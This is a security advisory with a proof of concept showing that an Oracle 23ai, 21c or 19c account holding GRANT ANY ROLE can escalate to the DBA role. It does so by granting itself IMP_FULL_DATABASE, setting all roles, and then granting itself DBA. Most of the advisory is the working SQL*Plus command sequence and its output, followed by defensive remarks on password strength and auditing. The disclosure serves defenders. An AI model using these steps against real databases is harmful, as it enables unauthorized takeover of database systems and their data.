Title: Oracle 23ai Privilege Escalation From GRANT ANY ROLE To DBA Role Vendor: Oracle Product: Oracle database system Affected Version(s): 23ai , 21c , 19c Risk Level: Medium Author of Advisory: Emad Al-Mousa <Overview>: Privilege escalation is one of the most common exploit techniques hackers use to abuse and take over critical systems, database systems are very important to be protected against such attacks for data security and protection. The presented exploit highlights a security design flaw that system admins and DBA's should be aware of. ***************************************************************************************************************************************** <Exploit Summary Details>: A database account granted the system privilege "GRANT ANY ROLE" , can be exploited to escalate/elevate to "DBA" role. ***************************************************************************************************************************************** <Proof of Concept (PoC)>: I will connect as SYS user and create a local database account called “tom” in pluggable database FREEPDB1 as shown below: sqlplus / as sysdba SQL> alter session set container=FREEPDB1; Session altered. SQL> create user tom identified by tom123; User created. SQL> grant create session to tom; Grant succeeded. SQL> grant grant any role to tom; Grant succeeded. SQL> alter user tom default role all; SQL> exit; Next, I will connect using tom account to the database directly using sqlplus: sqlplus "tom/tom123"@FREEPDB1 Attempting to grant DBA role to myself will not work as expected [it will be blocked to prevent escalation attempt] ! SQL> grant dba to tom; grant dba to tom * ERROR at line 1: ORA-01031: insufficient privileges Attempting to grant DBA role to another existing account “hr” in the database will not work also ! SQL> grant dba to hr; grant dba to hr * ERROR at line 1: ORA-01031: insufficient privileges The account has limited power as shown below (can’t create another database account called “tom2” and can’t view any database table) so its limited in power: SQL> show user USER is "TOM" SQL> SQL> create user tom2 identified by tom123; create user tom2 identified by tom123 * ERROR at line 1: ORA-01031: insufficient privileges Help: https://docs.oracle.com/error-help/db/ora-01031/ SQL> select * from HR.DEPT; select * from HR.DEPT * ERROR at line 1: ORA-00942: table or view "HR"."DEPT" does not exist Help: https://docs.oracle.com/error-help/db/ora-00942/ The account can grant low-level built in roles such as “resource” role for example to another database accounts (as designed to do so): SQL> show user USER is "TOM" SQL> SQL> grant resource to hr_app; Grant succeeded. The security vulnerability/weakness problem is the ability of the account to escalate to DBA role as shown below: SQL> grant IMP_FULL_DATABASE to tom; Grant succeeded. SQL> set role all; Role set. SQL> grant dba to tom; Grant succeeded. Now, account TOM is elevated to DBA role successfully !! ***************************************************************************************************************************************** <Remarks & Conclusion>: A database account with “GRANT ANY ROLE” should have the power to grant roles to “other” accounts. The above simple scenario shows that if the account gets compromised it can be easily elevated to “DBA” role. Make sure that accounts in your database systems with high system privilege permissions passwords are complex, long, and protected. And, of course security auditing will greatly help in detecting privilege escalation attempts in your landscape. ***************************************************************************************************************************************** References: https://databasesecurityninja.wordpress.com/2025/07/02/oracle-23ai-privilege-escalation-from-grant-any-role-to-dba-role/ https://docs.oracle.com/en/database/oracle/oracle-database/23/dbseg/configuring-privilege-and-role-authorization.html#GUID-FEC9C8E4-B935-405B-8994-9AC5A71C6DD7